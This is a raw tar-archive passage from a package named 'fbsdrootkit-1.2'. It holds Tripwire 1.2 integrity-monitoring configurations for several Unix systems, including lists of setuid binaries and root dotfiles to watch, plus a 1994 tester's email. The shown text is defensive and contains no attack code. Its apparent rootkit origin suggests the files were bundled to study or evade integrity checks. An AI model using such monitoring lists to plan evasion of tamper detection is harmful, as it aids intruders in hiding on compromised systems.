/usr/bin/rlogin R /usr/bin/remsh R /usr/bin/uucp R /usr/bin/uuname R /usr/bin/uustat R /usr/bin/uux R /usr/bin/vmstat R /etc/arp R /usr/etc/nfsstat R /usr/etc/rpc.rwalld R fbsdrootkit-1.2/tripwire-1.2/configs/tw.conf.irix100600 764 764 14273 5620062021 17221 0ustar dfdfFrom rickert@cco.caltech.edu Sat Jul 30 11:17:32 1994 Received: from optima.CS.Arizona.EDU by quercus.cs.arizona.edu; Sat, 30 Jul 1994 11:17:31 MST Received: from piccolo.cco.caltech.edu by optima.cs.arizona.edu (5.65c/15) via SMTP id AA00375; Sat, 30 Jul 1994 11:17:29 MST Received: from accord.cco.caltech.edu by piccolo.cco.caltech.edu with ESMTP (8.6.7/DEI:4.41) id LAA28348; Sat, 30 Jul 1994 11:17:24 -0700 From: rickert@cco.caltech.edu (Keith Warren Rickert) Received: by accord.cco.caltech.edu (8.6.7/UGCS:4.41) id LAA04047; Sat, 30 Jul 1994 11:17:23 -0700 Date: Sat, 30 Jul 1994 11:17:23 -0700 Message-Id: <199407301817.LAA04047@accord.cco.caltech.edu> To: gkim@cs.arizona.edu Subject: Re: Status report #2: Tripwire v1.2 Status: OR I've checked out the Beta2 version of Tripwire 1.2, and had no problems at all under Irix 4.0.5, in both the tests and real use, including interactive database update. The following file is a tw.config which I think includes most of the important files for an Irix 4.0.x installation, although no guarantees for people with different software packages installed than I have. -------------------------------------------------------------------- # $Id: tw.conf.irix,v 1.1 1994/08/04 03:44:17 gkim Exp $ # # tripwire.config # Generic version for IRIX 4.x # Will need editing...see comments below # # This file contains a list of files and directories that System # Preener will scan. Information collected from these files will be # stored in the tripwire.database file. # # Format: [!|=] entry [ignore-flags] # # where: '!' signifies the entry is to be pruned (inclusive) from # the list of files to be scanned. # '=' signifies the entry is to be added, but if it is # a directory, then all its contents are pruned # (useful for /tmp). # # where: entry is the absolute pathname of a file or a directory # # where ignore-flags are in the format: # [template][ [+|-][pinugsam12] ... ] # # - : ignore the following atributes # + : do not ignore the following attributes # # p : permission and file mode bits a: access timestamp # i : inode number m: modification timestamp # n : number of links (ref count) c: inode creation timestamp # u : user id of owner 1: signature 1 # g : group id of owner 2: signature 2 # s : size of file # # # Ex: The following entry will scan all the files in /etc, and report # any changes in mode bits, inode number, reference count, uid, # gid, modification and creation timestamp, and the signatures. # However, it will ignore any changes in the access timestamp. # # /etc +pinugsm12-a # # The following templates have been pre-defined to make these long ignore # mask descriptions unecessary. # # Templates: (default) R : [R]ead-only (+pinugsm12-a) # L : [L]og file (+pinug-sam12) # N : ignore [N]othing (+pinusgsamc12) # E : ignore [E]verything (-pinusgsamc12) # # By default, Tripwire uses the R template -- it ignores # only the access timestamp. # # You can use templates with modifiers, like: # Ex: /etc/lp E+ug # # Example configuration file: # /etc R # all system files # !/etc/lp R # ...but not those logs # =/tmp N # just the directory, not its files # # Note the difference between pruning (via "!") and ignoring everything # (via "E" template): Ignoring everything in a directory still monitors # for added and deleted files. Pruning a directory will prevent Tripwire # from even looking in the specified directory. # # # Tripwire running slowly? Modify your tripwire.config entries to # ignore the (signature 2) attribute when this computationally-exorbitant # protection is not needed. (See README and design document for further # details.) # # First, root's "home" =/ L /.rhosts R # may not exist /.profile R # may not exist /.cshrc R # may not exist /.login R # may not exist /.exrc R # may not exist /.logout R # may not exist /.forward R # may not exist /.netrc R # may not exist # Unix itself /unix R # Now, some critical directories and files # Some exceptions are noted further down /etc R /etc/rc0.d R /etc/rc2.d R /etc/rc3.d R /etc/init.d R /etc/config R /etc/mtab L /etc/motd L /etc/rmtab L /etc/utmp L /etc/wtmp L /etc/OLDwtmp L /etc/xutmp L /etc/group R # changes should be infrequent # The next line may need to be replaced with /etc/security # if C2 is enabled /etc/passwd L /dev L /usr/etc R # Checksumming the following is not so critical. However, # setuid/setgid files are special-cased further down. /lib R-2 /bin R-2 /usr/bin R-2 /usr/sbin R-2 /usr/bsd R-2 /usr/lib R-2 /usr/adm L /usr/admin R /usr/bin/X11 R-2 =/usr L =/usr/spool L /usr/spool/cron L /usr/spool/mqueue L /usr/mail L # You may or may not have the following /usr/people/ftp L /usr/people/ftp/bin R /usr/people/ftp/etc R # put entries for uucp if you need them =/tmp =/usr/tmp # Here are entries for setuid/setgid files. On these, we use # both signatures just to be sure. # # You may want/need to edit this list. Batteries not inc. /usr/lib/sendmail R /usr/lib/acct/accton R /usr/lib/envm/longinfo R /usr/lib/sendmail.old R /usr/adm/mkpts R /usr/bin/at R /usr/bin/crontab R /usr/bin/X11/cdplayer R /usr/bin/X11/xterm R /usr/bin/X11/Xsgi R /usr/bin/cancel R /usr/bin/lp R /usr/bin/lpstat R /usr/bin/under R /usr/bsd/lpq R /usr/bsd/lpr R /usr/bsd/lprm R /usr/bsd/rcp R /usr/bsd/rdist R /usr/bsd/rlogin R /usr/bsd/rsh R /usr/etc/lpd R /usr/etc/ping R /usr/etc/route R /usr/etc/timedc R /usr/etc/traceroute R /usr/sbin/cdinstmgr R /usr/sbin/eject R /usr/sbin/gr_osview R /usr/sbin/gr_top R /usr/sbin/pandora R /usr/sbin/xwsh R /usr/sbin/systemdown R /usr/sbin/top R /usr/sbin/vadmin R /usr/demos/bin/setup_dgl R /bin/df R /bin/login R /bin/mail R /bin/newgrp R /bin/passwd R /bin/su R /etc/lvinfo R /etc/suid_exec R /usr/lib/expreserve R /usr/lib/sendmail R /usr/lib/sa/sadc R /usr/bin/X11/xload R /usr/bin/X11/xterm R /usr/bsd/lpq R /usr/bsd/lpr R /usr/bsd/lprm R /usr/bsd/w R /usr/etc/arp R /usr/etc/fam R /usr/etc/lpc R /usr/etc/lpd R /usr/etc/netstat R /usr/etc/nfsstat R /usr/etc/traceroute R /usr/sbin/Mail R /usr/sbin/osview R /usr/demos/bin/setup_dgl R /bin/ipcs R /bin/mail R /bin/ps R /bin/rmail R /etc/fuser R /etc/killall R /etc/savecore R /etc/whodo R -------------------------------------------------------------------- Regards, Keith fbsdrootkit-1.2/tripwire-1.2/configs/tw.conf.linux100600 764 764 465 5547660173 17367 0ustar dfdf# $Id: tw.conf.linux,v 1.1 1994/04/04 00:34:03 gkim Exp $ # # tripwire.config for linux mahcines # (minimal version) # # # Define a variable for searching /dev # @@define DEVSEARCH E+pinugsamc # # All Files # / R # # Except /proc # =/proc E # # And /dev # /dev @@DEVSEARCH # # just /tmp # =/tmp # # End # fbsdrootkit-1.2/tripwire-1.2/configs/tw.conf.next100600 764 764 5610 5434607461 17217 0ustar dfdf# $Id: tw.conf.next,v 1.3 1993/08/19 05:27:13 genek Exp $ # # Lance R. Bailey # # First, root's "home" =/ L /.rhosts R # may not exist /.profile R # may not exist /.cshrc R # may not exist /.login R # may not exist /.exrc R # may not exist /.logout R # may not exist /.emacs R # may not exist /.forward R # may not exist /.netrc R # may not exist # Unix itself /sdmach R # Now, some critical directories and files # Some exceptions are noted further down /etc R /etc/inetd.conf R /etc/rc R /etc/rc.boot R /etc/rc.local R /etc/rc.single R /etc/rc.ip R /etc/ttytab R /etc/exports R /etc/ttys L /etc/dumpdates L /etc/mtab L /etc/motd L /etc/rmtab L /etc/utmp L /etc/group R # changes should be infrequent # The next line may need to be replaced with /etc/security # if C2 is enabled /etc/passwd L /var L /dev L /usr/etc R # Checksumming the following is not so critical. However, # setuid/setgid files are special-cased further down. /lib R-2 /bin R-2 /usr/bin R-2 /usr/ucb R-2 /usr/lib R-2 =/usr L =/usr/spool L /usr/spool/cron L /usr/spool/mqueue L /usr/spool/mail L # You may or may not have the following #/usr/ftp L #/usr/ftp/bin R #/usr/ftp/etc R # put entries in for /var/yp if you need it # put entries for uucp if you need them # put entries for /var/adm if you need it =/tmp =/var/tmp # Here are entries for setuid/setgid files. On these, we use # both signatures just to be sure. # # You may want/need to edit this list. Batteries not inc. /bin/at R /bin/atq R /bin/atrm R /bin/cancel R /bin/chfn R /bin/chsh R /bin/crontab R /bin/cu R /bin/df R /bin/iostat R /bin/ipcs R /bin/login R /bin/lpstat R /bin/mail R /bin/newgrp R /bin/passwd R /bin/su R /bin/sunview1/sv_acquire R /bin/sunview1/sv_release R /bin/sunview1/toolplaces R /bin/tip R /bin/uucp R /bin/uuname R /bin/uustat R /bin/uux R /bin/wall R /bin/write R /bin/ypchfn R /bin/ypchsh R /bin/yppasswd R /usr/bin/at R /usr/bin/atq R /usr/bin/atrm R /usr/bin/cancel R /usr/bin/chfn R /usr/bin/chsh R /usr/bin/crontab R /usr/bin/cu R /usr/bin/df R /usr/bin/iostat R /usr/bin/ipcs R /usr/bin/login R /usr/bin/lpstat R /usr/bin/mail R /usr/bin/newgrp R /usr/bin/passwd R /usr/bin/su R /usr/bin/sunview1/sv_acquire R /usr/bin/sunview1/sv_release R /usr/bin/sunview1/toolplaces R /usr/bin/tip R /usr/bin/uucp R /usr/bin/uuname R /usr/bin/uustat R /usr/bin/uux R /usr/bin/wall R /usr/bin/write R /usr/bin/ypchfn R /usr/bin/ypchsh R /usr/bin/yppasswd R /usr/etc/arp R /usr/etc/chill R /usr/etc/devinfo R /usr/etc/dkinfo R /usr/etc/dmesg R /usr/etc/dump R /usr/etc/dumpfs R /usr/etc/keyenvoy R /usr/etc/kgmon R /usr/etc/lpc R /usr/etc/nfsstat R /usr/etc/ping R /usr/etc/rpc.rwalld R /usr/etc/trpt R /usr/ucb/lpq R /usr/ucb/lpr R /usr/ucb/netstat R /usr/ucb/rcp R /usr/ucb/rdist R /usr/ucb/rlogin R /usr/ucb/rsh R /usr/ucb/talk R /usr/ucb/vmstat R fbsdrootkit-1.2/tripwire-1.2/configs/tw.conf.s5100600 764 764 11263 5434607462 16612 0ustar dfdf# $Id: tw.conf.s5,v 1.3 1993/08/19 05:27:14 genek Exp $ # # # tripwire.config # Generic version for: # # SystemV/386 R3.2 configuration by W. Purvis # # This file contains a list of files and directories that System # Preener will scan. Information collected from these files will be # stored in the tripwire.database file. # # Format: [!|=] entry [ignore-flags] # # where: '!' signifies the entry is to be pruned (inclusive) from # the list of files to be scanned. # '=' signifies the entry is to be added, but if it is # a directory, then all its contents are pruned # (useful for /tmp). # # where: entry is the absolute pathname of a file or a directory # # where ignore-flags are in the format: # [template][ [+|-][pinugsam12] ... ] # # - : ignore the following atributes # + : do not ignore the following attributes # # p : permission and file mode bits a: access timestamp # i : inode number m: modification timestamp # n : number of links (ref count) c: inode creation timestamp # u : user id of owner 1: signature 1 # g : group id of owner 2: signature 2 # s : size of file # # # Ex: The following entry will scan all the files in /etc, and report # any changes in mode bits, inode number, reference count, uid, # gid, modification and creation timestamp, and the signatures. # However, it will ignore any changes in the access timestamp. # # /etc +pinugsm12-a # # The following templates have been pre-defined to make these long ignore # mask descriptions unecessary. # # Templates: (default) R : [R]ead-only (+pinugsm12-a) # L : [L]og file (+pinug-sam12) # N : ignore [N]othing (+pinusgsamc12) # E : ignore [E]verything (-pinusgsamc12) # # By default, Tripwire uses the R template -- it ignores # only the access timestamp. # # You can use templates with modifiers, like: # Ex: /etc/lp E+ug # # Example configuration file: # /etc R # all system files # !/etc/lp R # ...but not those logs # =/tmp N # just the directory, not its files # # Note the difference between pruning (via "!") and ignoring everything # (via "E" template): Ignoring everything in a directory still monitors # for added and deleted files. Pruning a directory will prevent Tripwire # from even looking in the specified directory. # # # Tripwire running slowly? Modify your tripwire.config entries to # ignore the (signature 2) attribute when this computationally-exorbitant # protection is not needed. (See README and design document for further # details.) # # First, root's "home" =/ L /.rhosts R # may not exist /.profile R # may not exist /.cshrc R # may not exist /.login R # may not exist #/.exrc R # may not exist # Unix itself /unix R # Now, some critical directories and files # Some exceptions are noted further down /etc R /etc/inetd.conf R /etc/rc R /etc/rc.boot R /etc/rc.local R /etc/rc.single R /etc/rc.ip R /etc/ttytab R /etc/exports R /etc/ttys L /etc/dumpdates L /etc/mtab L /etc/motd L /etc/rmtab L /etc/utmp L /etc/group R # changes should be infrequent # The next line may need to be replaced with /etc/security # if C2 is enabled /etc/passwd L !/dev /usr/etc R /usr/local R /usr/local/log L # Checksumming the following is not so critical. However, # setuid/setgid files are special-cased further down. /lib R-2 /bin R-2 /usr/bin R-2 /usr/ucb R-2 /usr/lib R-2 /usr/local/lib/nqs/logfile L =/usr L =/usr/spool L /usr/spool/cron L /usr/spool/mqueue L /usr/spool/mail L =/usr/spool/nqs/private =/usr/spool/nqs/times # You may or may not have the following #/usr/ftp L #/usr/ftp/bin R #/usr/ftp/etc R # put entries in for /var/yp if you need it # put entries for uucp if you need them # put entries for /var/adm if you need it =/tmp # Here are entries for setuid/setgid files. On these, we use # both signatures just to be sure. # # You may want/need to edit this list. Batteries not inc. /bin/at R /bin/atq R /bin/atrm R /bin/cancel R /bin/chfn R /bin/chsh R /bin/crontab R /bin/cu R /bin/df R /bin/iostat R /bin/ipcs R /bin/login R /bin/lpstat R /bin/mail R /bin/newgrp R /bin/passwd R /bin/su R /bin/tip R #/bin/uucp R #/bin/uuname R #/bin/uustat R #/bin/uux R /bin/wall R /bin/write R /bin/ypchfn R /bin/ypchsh R /bin/yppasswd R /usr/bin/at R /usr/bin/atq R /usr/bin/atrm R /usr/bin/cancel R /usr/bin/chfn R /usr/bin/chsh R /usr/bin/crontab R /usr/bin/cu R /usr/bin/df R /usr/bin/iostat R /usr/bin/ipcs R /usr/bin/login R /usr/bin/lpstat R /usr/bin/mail R /usr/bin/newgrp R /usr/bin/passwd R /usr/bin/su R /usr/bin/tip R #/usr/bin/uucp R #/usr/bin/uuname R #/usr/bin/uustat R #/usr/bin/uux R /usr/bin/wall R /usr/bin/write R /usr/bin/ypchfn R /usr/bin/ypchsh R /usr/bin/yppasswd R fbsdrootkit-1.2/tripwire-1.2/configs/tw.conf.sun100600 764 764 10603 5503115202 17044 0ustar dfdf# $Id: tw.conf.sun,v 1.6 1993/12/13 16:38:26 genek Exp $ # # tripwire.config # Generic version for SunOS 4.x # Will need editing...see comments below # Modified by Rik Farrow, 11/28/93. # (You may want to disable signature 2 and enable signature 5 for # better performance.) # # First, root's "home" =/ L /.rhosts R # may not exist /.profile R # may not exist /.cshrc R # may not exist /.login R # may not exist /.exrc R # may not exist /.logout R # may not exist /.emacs R # may not exist /.forward R # may not exist /.netrc R # may not exist # GENE: A root user may have an .openwin-init, which is a shell script /.openwin-init L # this file is updated from a menu option # Unix itself /vmunix R # GENE: Other critical Sun files: boot, the boot program, and kadb /boot R /kadb R # Now, some critical directories and files # Some exceptions are noted further down /etc R /etc/inetd.conf R /etc/rc R /etc/rc.boot R /etc/rc.local R /etc/rc.single R /etc/rc.ip R /etc/ttytab R /etc/exports R /etc/ttys L /etc/dumpdates L /etc/mtab L /etc/motd L /etc/rmtab L /etc/utmp L /etc/group R # changes should be infrequent # The next line may need to be replaced with /etc/security # if C2 is enabled /etc/passwd L /var L /dev L /usr/etc R # GENE: /sbin contains binaries critical when in single user mode /sbin R # Checksumming the following is not so critical. However, # setuid/setgid files are special-cased further down. #/lib R-2 GENE: This is a symbolic link in 4.1.x #/bin R-2 GENE: This is a symbolic link in 4.1.x /usr/bin R /usr/ucb R # GENE: Other SunOS directories, including 5bin, which may be in PATH /usr/5bin R /usr/5lib R /usr/diag R /usr/kvm R /usr/lddrv R /usr/openwin/bin R /usr/openwin/lib R !/usr/openwin/lib/fonts /usr/xpg2bin R # GENE: End additions /usr/lib R # GENE: get rid of the fonts directories; perhaps could look only at dir perms !/usr/lib/fonts !/usr/lib/font !/usr/lib/fontinfo !/usr/lib/xglfonts !/usr/lib/vfont =/usr L =/usr/spool L # GENE: the real spool directory on Suns ... =/var/spool L /var/spool/cron L /var/spool/mqueue L /var/spool/mail L # GENE: additional spool directories in SunOS ... /var/spool/secretmail L =/var/spool/uucp L =/var/spool/lpd L # You may or may not have the following #/usr/ftp L #/usr/ftp/bin R #/usr/ftp/etc R # put entries in for /var/yp if you need it # put entries for uucp if you need them # put entries for /var/adm if you need it =/tmp =/var/tmp # Here are entries for setuid/setgid files. On these, we use # both signatures just to be sure. # # You may want/need to edit this list. Batteries not inc. # GENE: I replaced your list with a locally generated one. Your list # included files in /bin--which is a symbolic link to /usr/bin. Note # duplication of commmands in /bin and commands in /usr/bin in your original. # Also, you had missed any files in the optional Sys V compatibility # directories. /usr/5bin/su R /usr/bin/at R /usr/bin/atq R /usr/bin/atrm R /usr/bin/cancel R /usr/bin/chfn R /usr/bin/chsh R /usr/bin/crontab R /usr/bin/cu R /usr/bin/df R /usr/bin/fusage R /usr/bin/iostat R /usr/bin/ipcs R /usr/bin/login R /usr/bin/lpstat R /usr/bin/mail R /usr/bin/newgrp R /usr/bin/nsquery R /usr/bin/passwd R /usr/bin/su R /usr/bin/sunview1/sv_acquire R /usr/bin/sunview1/sv_release R /usr/bin/sunview1/toolplaces R /usr/bin/tip R /usr/bin/uucp R /usr/bin/uuname R /usr/bin/uustat R /usr/bin/uux R /usr/bin/wall R /usr/bin/write R /usr/bin/ypchfn R /usr/bin/ypchsh R /usr/bin/yppasswd R /usr/etc/arp R /usr/etc/auditd R /usr/etc/chill R /usr/etc/devinfo R /usr/etc/dkinfo R /usr/etc/dmesg R /usr/etc/dump R /usr/etc/dumpfs R /usr/etc/keyenvoy R /usr/etc/kgmon R /usr/etc/lpc R /usr/etc/nfsstat R /usr/etc/ping R /usr/etc/rfsetup R /usr/etc/shutdown R /usr/etc/trpt R /usr/games/chesstool R /usr/games/fortune R /usr/games/hack R /usr/games/robots R /usr/games/snake R /usr/kvm/getcons R /usr/kvm/ps R /usr/kvm/pstat R /usr/kvm/w R /usr/lib/acct/accton R /usr/lib/expreserve R /usr/lib/exrecover R /usr/lib/lpd R /usr/lib/sendmail R /usr/lib/sendmail.mx R /usr/lib/uucp/remote.unknown R /usr/lib/uucp/uucico R /usr/lib/uucp/uusched R /usr/lib/uucp/uuxqt R /usr/openwin/bin/loadmodule R /usr/openwin/bin/xload R /usr/openwin/lib/mkcookie R /usr/ucb/lpq R /usr/ucb/lpr R /usr/ucb/lprm R /usr/ucb/netstat R /usr/ucb/quota R /usr/ucb/rcp R /usr/ucb/rdist R /usr/ucb/rlogin R /usr/ucb/rsh R /usr/ucb/talk R /usr/ucb/vmstat R fbsdrootkit-1.2/tripwire-1.2/configs/tw.conf.sun.old100600 764 764 12357 5476717461 17661 0ustar dfdf# $Id: tw.conf.sun.old,v 1.1 1993/11/30 19:29:53 genek Exp $ # # tripwire.config # Generic version for SunOS 4.x # Will need editing...see comments below # # This file contains a list of files and directories that System # Preener will scan. Information collected from these files will be # stored in the tripwire.database file. # # Format: [!|=] entry [ignore-flags] # # where: '!' signifies the entry is to be pruned (inclusive) from # the list of files to be scanned. # '=' signifies the entry is to be added, but if it is # a directory, then all its contents are pruned # (useful for /tmp). # # where: entry is the absolute pathname of a file or a directory # # where ignore-flags are in the format: # [template][ [+|-][pinugsam12] ... ] # # - : ignore the following atributes # + : do not ignore the following attributes # # p : permission and file mode bits a: access timestamp # i : inode number m: modification timestamp # n : number of links (ref count) c: inode creation timestamp # u : user id of owner 1: signature 1 # g : group id of owner 2: signature 2 # s : size of file # # # Ex: The following entry will scan all the files in /etc, and report # any changes in mode bits, inode number, reference count, uid, # gid, modification and creation timestamp, and the signatures. # However, it will ignore any changes in the access timestamp. # # /etc +pinugsm12-a # # The following templates have been pre-defined to make these long ignore # mask descriptions unecessary. # # Templates: (default) R : [R]ead-only (+pinugsm12-a) # L : [L]og file (+pinug-sam12) # N : ignore [N]othing (+pinusgsamc12) # E : ignore [E]verything (-pinusgsamc12) # # By default, Tripwire uses the R template -- it ignores # only the access timestamp. # # You can use templates with modifiers, like: # Ex: /etc/lp E+ug # # Example configuration file: # /etc R # all system files # !/etc/lp R # ...but not those logs # =/tmp N # just the directory, not its files # # Note the difference between pruning (via "!") and ignoring everything # (via "E" template): Ignoring everything in a directory still monitors # for added and deleted files. Pruning a directory will prevent Tripwire # from even looking in the specified directory. # # # Tripwire running slowly? Modify your tripwire.config entries to # ignore the (signature 2) attribute when this computationally-exorbitant # protection is not needed. (See README and design document for further # details.) # # First, root's "home" =/ L /.rhosts R # may not exist /.profile R # may not exist /.cshrc R # may not exist /.login R # may not exist /.exrc R # may not exist /.logout R # may not exist /.emacs R # may not exist /.forward R # may not exist /.netrc R # may not exist # Unix itself /vmunix R # Now, some critical directories and files # Some exceptions are noted further down /etc R /etc/inetd.conf R /etc/rc R /etc/rc.boot R /etc/rc.local R /etc/rc.single R /etc/rc.ip R /etc/ttytab R /etc/exports R /etc/ttys L /etc/dumpdates L /etc/mtab L /etc/motd L /etc/rmtab L /etc/utmp L /etc/group R # changes should be infrequent # The next line may need to be replaced with /etc/security # if C2 is enabled /etc/passwd L /var L /dev L /usr/etc R # Checksumming the following is not so critical. However, # setuid/setgid files are special-cased further down. /lib R-2 /bin R-2 /usr/bin R-2 /usr/ucb R-2 /usr/lib R-2 =/usr L =/usr/spool L /usr/spool/cron L /usr/spool/mqueue L /usr/spool/mail L # You may or may not have the following #/usr/ftp L #/usr/ftp/bin R #/usr/ftp/etc R # put entries in for /var/yp if you need it # put entries for uucp if you need them # put entries for /var/adm if you need it =/tmp =/var/tmp # Here are entries for setuid/setgid files. On these, we use # both signatures just to be sure. # # You may want/need to edit this list. Batteries not inc. /bin/at R /bin/atq R /bin/atrm R /bin/cancel R /bin/chfn R /bin/chsh R /bin/crontab R /bin/cu R /bin/df R /bin/iostat R /bin/ipcs R /bin/login R /bin/lpstat R /bin/mail R /bin/newgrp R /bin/passwd R /bin/su R /bin/sunview1/sv_acquire R /bin/sunview1/sv_release R /bin/sunview1/toolplaces R /bin/tip R /bin/uucp R /bin/uuname R /bin/uustat R /bin/uux R /bin/wall R /bin/write R /bin/ypchfn R /bin/ypchsh R /bin/yppasswd R /usr/bin/at R /usr/bin/atq R /usr/bin/atrm R /usr/bin/cancel R /usr/bin/chfn R /usr/bin/chsh R /usr/bin/crontab R /usr/bin/cu R /usr/bin/df R /usr/bin/iostat R /usr/bin/ipcs R /usr/bin/login R /usr/bin/lpstat R /usr/bin/mail R /usr/bin/newgrp R /usr/bin/passwd R /usr/bin/su R /usr/bin/sunview1/sv_acquire R /usr/bin/sunview1/sv_release R /usr/bin/sunview1/toolplaces R /usr/bin/tip R /usr/bin/uucp R /usr/bin/uuname R /usr/bin/uustat R /usr/bin/uux R /usr/bin/wall R /usr/bin/write R /usr/bin/ypchfn R /usr/bin/ypchsh R /usr/bin/yppasswd R /usr/etc/arp R /usr/etc/chill R /usr/etc/devinfo R /usr/etc/dkinfo R /usr/etc/dmesg R /usr/etc/dump R /usr/etc/dumpfs R /usr/etc/keyenvoy R /usr/etc/kgmon R /usr/etc/lpc R /usr/etc/nfsstat R /usr/etc/ping R /usr/etc/rpc.rwalld R /usr/etc/trpt R /usr/ucb/lpq R /usr/ucb/lpr R /usr/ucb/netstat R /usr/ucb/rcp R /usr/ucb/rdist R /usr/ucb/rlogin R /usr/ucb/rsh R /usr/ucb/talk R /usr/ucb/vmstat R fbsdrootkit-1.2/tripwire-1.2/configs/tw.conf.sunos5100600 764 764 12037 5434607464 17521 0ustar dfdf# # tripwire.config # Generic version for SunOS 5.x (i.e, Solaris2.*) # Preliminary version by Bob Cunningham (bob@soest.hawaii.edu) 24June1993 # Will need editing...see comments below # # This file contains a list of files and directories that System # Preener will scan. Information collected from these files will be # stored in the tripwire.database file. # # Format: [!|=] entry [ignore-flags] # # where: '!' signifies the entry is to be pruned (inclusive) from # the list of files to be scanned. # '=' signifies the entry is to be added, but if it is # a directory, then all its contents are pruned # (useful for /tmp). # # where: entry is the absolute pathname of a file or a directory # # where ignore-flags are in the format: # [template][ [+|-][pinugsam12] ... ] # # - : ignore the following atributes # + : do not ignore the following attributes # # p : permission and file mode bits a: access timestamp # i : inode number m: modification timestamp # n : number of links (ref count) c: inode creation timestamp # u : user id of owner 1: signature 1 # g : group id of owner 2: signature 2 # s : size of file # # # Ex: The following entry will scan all the files in /etc, and report # any changes in mode bits, inode number, reference count, uid, # gid, modification and creation timestamp, and the signatures. # However, it will ignore any changes in the access timestamp. # # /etc +pinugsm12-a # # The following templates have been pre-defined to make these long ignore # mask descriptions unecessary. # # Templates: (default) R : [R]ead-only (+pinugsm12-a) # L : [L]og file (+pinug-sam12) # N : ignore [N]othing (+pinusgsamc12) # E : ignore [E]verything (-pinusgsamc12) # # By default, Tripwire uses the R template -- it ignores # only the access timestamp. # # You can use templates with modifiers, like: # Ex: /etc/lp E+ug # # Example configuration file: # /etc R # all system files # !/etc/lp R # ...but not those logs # =/tmp N # just the directory, not its files # # Note the difference between pruning (via "!") and ignoring everything # (via "E" template): Ignoring everything in a directory still monitors # for added and deleted files. Pruning a directory will prevent Tripwire # from even looking in the specified directory. # # # Tripwire running slowly? Modify your tripwire.config entries to # ignore the (signature 2) attribute when this computationally-exorbitant # protection is not needed. (See README and design document for further # details.) # # First, root's "home" =/ L /.rhosts R # may not exist /.profile R # may not exist /.cshrc R # may not exist /.login R # may not exist #/.exrc R # may not exist /.logout R # may not exist #/.emacs R # may not exist /.forward R # may not exist /.netrc R # may not exist #/.mailrc R # may not exist # Unix itself /kernel/unix R # Now, some critical directories and files # Some exceptions are noted further down /dev L /devices L =/devices/pseudo L /etc R /etc/default R /etc/dfs/dfstab R /etc/dfs/sharetab R /etc/dumpdates L /etc/group R # changes should be infrequent /etc/hosts.equiv R /etc/inet/inetd.conf R /etc/inet/protocols R /etc/inet/services R /etc/init.d R /etc/motd L #/etc/named.boot R # may not exist /etc/opt R /etc/passwd L /etc/profile R /etc/remote R /etc/rmtab L /etc/rpc R =/etc/saf L /etc/shadow L /etc/system R /etc/ttydefs L /etc/ttysrch R /hsfsboot R /kernel R /opt R /sbin R /ufsboot R /usr/sbin R =/var L =/var/adm L /var/adm/utmp L /var/adm/wtmp L /var/adm/wtmpx L /var/adm/sulog L =/var/adm/sa L =/var/spool L # Checksumming the following is not so critical. However, # setuid/setgid files are special-cased further down. =/usr L /usr/aset R-2 /usr/bin R-2 /usr/ccs R-2 /usr/kernel R-2 /usr/lib R-2 /usr/ucb R-2 /usr/openwin/bin R-2 # You may or may not have the following #/usr/ftp L #/usr/ftp/bin R #/usr/ftp/etc R # put entries in for /var/yp if you need it # put entries for uucp if you need them # put entries for /var/adm if you need it =/tmp L =/var/tmp L =/proc L # Here are entries for setuid/setgid files. On these, we use # both signatures just to be sure. # # You may want/need to edit this list. Batteries not inc. /usr/bin/at R /usr/bin/atq R /usr/bin/atrm R /usr/bin/chkey R /usr/bin/crontab R /usr/bin/ct R /usr/bin/cu R /usr/bin/eject R /usr/bin/login R /usr/bin/mail R /usr/bin/mailx R /usr/bin/netstat R /usr/bin/newgrp R /usr/bin/nfsstat R /usr/bin/passwd R /usr/bin/ps R /usr/bin/rcp R /usr/bin/rsh R /usr/bin/rdist R /usr/bin/rlogin R /usr/bin/su R /usr/bin/tip R /usr/bin/uucp R /usr/bin/uuglist R /usr/bin/uuname R /usr/bin/uustat R /usr/bin/uux R /usr/bin/volcheck R /usr/bin/w R /usr/bin/write R /usr/bin/yppasswd R /usr/ucb/ps R # Some other /usr/bin programs you may also wish to check /usr/bin/csh R /usr/bin/jsh R /usr/bin/kdestroy R /usr/bin/keylogin R /usr/bin/keylogout R /usr/bin/kinit R /usr/bin/klist R /usr/bin/ksh R /usr/bin/ksrvtgt R /usr/bin/rksh R /usr/bin/sh R fbsdrootkit-1.2/tripwire-1.2/configs/tw.conf.ultrix100600 764 764 2510 5474057112 17560 0ustar dfdf# $Id: tw.conf.ultrix,v 1.4 1993/11/22 06:38:02 genek Exp $ # # Submitted by: Edward DeHart # # kernel # /vmunix # # access files # /usr/bin/login /usr/bin/su # # system config # /etc/crontab /etc/exports /etc/disktab /etc/fstab /etc/gettytab /etc/hosts /etc/hosts.equiv /etc/hosts.lpd /etc/inetd.conf /etc/printcap /etc/rc /etc/rc.local /etc/resolv.conf /etc/sendmail.cf /etc/services /etc/svc.conf /etc/ttys # # config files for daemon wrapper # uncomment if using wrapper # #/etc/hosts.allow #/etc/hosts.deny # # Protect these two files if you are running ntp: # /etc/ntp.conf /usr/etc/ntpd # # network daemons # /usr/etc/fingerd /usr/etc/mountd /usr/etc/ftpd /usr/etc/telnetd /usr/etc/rlogind /usr/etc/rshd /usr/etc/nfsd /usr/etc/nfsportmon /usr/etc/nfssetlock /usr/etc/nfssetup /usr/etc/nfsstat /usr/etc/ntpd /usr/lib/sendmail /usr/etc/rexecd /usr/etc/snmpd /usr/etc/tcpd # # clients # /usr/ucb/finger /usr/ucb/ftp /usr/ucb/rcp /usr/ucb/rlogin /usr/ucb/rsh /usr/ucb/ruptime /usr/ucb/rwho /usr/ucb/talk /usr/ucb/telnet /usr/ucb/tftp # # programs # /usr/etc/ntp /usr/etc/portmap /usr/etc/quot /usr/bin/mail /usr/bin/wall /usr/bin/sh5 /bin/sh /bin/csh /usr/local/bin/tcsh # ### These files should be protected if you ### have Ultrix Upgraded or Enhanced security ### installed. /etc/sec/audit_events /etc/sec/auditd /etc/sec/auditmask fbsdrootkit-1.2/tripwire-1.2/databases/ 40700 764 764 0 5630552014 15126 5ustar dfdffbsdrootkit-1.2/tripwire-1.2/include/ 40700 764 764 0 5630552014 14622 5ustar dfdffbsdrootkit-1.2/tripwire-1.2/include/config.h100600 764 764 11673 5611466334 16377 0ustar dfdf/* $Id: config.h,v 1.5 1994/07/15 11:02:52 gkim Exp $ */ /* * config.h * * Tripwire configuration file * * Gene Kim * Purdue University */ /*** *** Operating System specifics *** *** Look in the .,/configs directory, and include appropriate header *** file that corresponds with your operating system. ***/ #include "../configs/conf-svr4.h" #ifdef TW_TYPE32 typedef TW_TYPE32 int32; typedef unsigned TW_TYPE32 uint32; #else typedef long int32; typedef unsigned long uint32; #endif /*** *** SYSTEM SPECIFIC 